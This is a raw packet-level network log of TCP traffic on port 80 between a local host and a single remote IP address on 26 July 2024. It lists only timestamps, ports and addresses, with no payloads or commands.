                Jul 26, 2024 09:30:08.224267960 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.224278927 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.224288940 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.224296093 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.224303961 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.224356890 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.224513054 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225009918 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225039005 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225049973 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225073099 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225089073 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225116014 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225127935 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225140095 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225151062 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225164890 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225172997 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225177050 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225188017 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225188017 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225200891 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225202084 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225214958 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225236893 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225327969 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225593090 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225615025 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225630999 CEST8049167107.173.143.46192.168.2.22
                Jul 26, 2024 09:30:08.225639105 CEST4916780192.168.2.22107.173.143.46
                Jul 26, 2024 09:30:08.225656033 CEST4916780192.168.2.22107.173.143.46
Jul 26, 2024 09:30:08.225672960 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.225720882 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.225733042 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.225745916 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.225764036 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.225764990 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.225776911 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.225781918 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.225789070 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.225800991 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.225801945 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.225825071 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.225836039 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.226155043 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.226170063 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.226181030 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.226214886 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.226231098 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.228796005 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.228873968 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.228907108 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.228919983 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.228931904 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.228944063 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.228944063 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.228960037 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.228966951 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.228970051 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.228984118 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.228998899 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.229013920 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308154106 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308197021 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308208942 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308221102 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308319092 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308332920 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308345079 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308343887 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308356047 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308367014 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308376074 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308378935 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308383942 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308392048 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308403015 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308422089 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308465004 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308476925 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308506012 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308514118 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308526039 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308542967 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308548927 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308551073 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308557987 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308566093 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308567047 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308568001 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308573008 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308587074 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308588028 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308598042 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308608055 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308609009 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308620930 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308624029 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308640003 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308640957 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308651924 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308660984 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308666945 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308677912 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308679104 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308689117 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308696985 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308698893 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308711052 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308713913 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308732033 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308748960 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308775902 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308794975 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308804989 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308811903 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308816910 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308825970 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308829069 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308829069 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308834076 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308847904 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308865070 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.308962107 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308984041 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.308995962 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309005976 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309021950 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309057951 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309140921 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309158087 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309164047 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309175014 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309181929 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309186935 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309196949 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309199095 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309202909 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309210062 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309216022 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309221983 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309233904 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309236050 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309256077 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309273005 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309314013 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309326887 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309336901 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309349060 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309356928 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309359074 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309370041 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309376001 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309386015 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309391022 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309391975 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309396982 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309401989 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309411049 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309427977 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309447050 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309465885 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309478045 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309489965 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309500933 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309509993 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309519053 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309521914 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309534073 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309535980 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309544086 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309555054 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309556961 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309567928 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309573889 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309587955 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.309590101 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309607029 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309624910 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.309712887 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310112953 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310126066 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310137033 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310153961 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310163975 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310165882 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310182095 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310184956 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310197115 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310201883 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310220957 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310239077 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310286999 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310297966 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310308933 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310318947 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310332060 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310333014 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310343981 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310348034 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310354948 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310365915 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310365915 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310378075 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310383081 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310401917 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310416937 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310435057 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310446978 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310460091 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310466051 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310470104 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310472012 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310481071 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310492039 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310492992 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310507059 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310508013 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310528994 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310542107 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310542107 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310575008 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310580969 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310587883 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310596943 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310602903 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310607910 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310611963 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.310621023 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.310641050 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.311171055 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.311184883 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.311197042 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.311208963 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.311218977 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.311223984 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.311232090 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.311244011 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.311260939 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395004988 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395044088 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395056009 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395066977 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395075083 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395077944 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395088911 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395102024 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395104885 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395126104 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395138979 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395138979 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395152092 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395159006 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395164967 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395183086 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395195007 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395195961 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395206928 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395210981 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395226955 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395246983 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395378113 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395390034 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395400047 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395417929 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395427942 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395428896 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395438910 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395451069 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395462990 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395466089 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395478010 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395489931 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395536900 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395540953 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395551920 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395562887 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395572901 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395579100 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395586014 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395591974 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395606041 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395606041 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395618916 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395648003 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395699024 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395709991 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395720959 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395730972 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395740032 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395741940 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395751953 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395754099 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395768881 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395768881 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395776987 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395778894 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395781994 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395782948 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395795107 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395800114 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395816088 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395828962 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395840883 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395853996 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395864964 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395874023 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395875931 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395886898 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395889997 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395898104 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395905018 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395924091 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395926952 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395939112 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395948887 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395961046 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395963907 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395971060 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395972013 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395977020 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395983934 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.395992041 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.395997047 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.396006107 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.396019936 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.396019936 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.396033049 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.396049023 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.396053076 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.396080971 CEST  49167  80     192.168.2.22    107.173.143.46
Jul 26, 2024 09:30:08.396102905 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.396115065 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.396126032 CEST  80     49167  107.173.143.46  192.168.2.22
Jul 26, 2024 09:30:08.396145105 CEST  49167  80     192.168.2.22    107.173.143.46
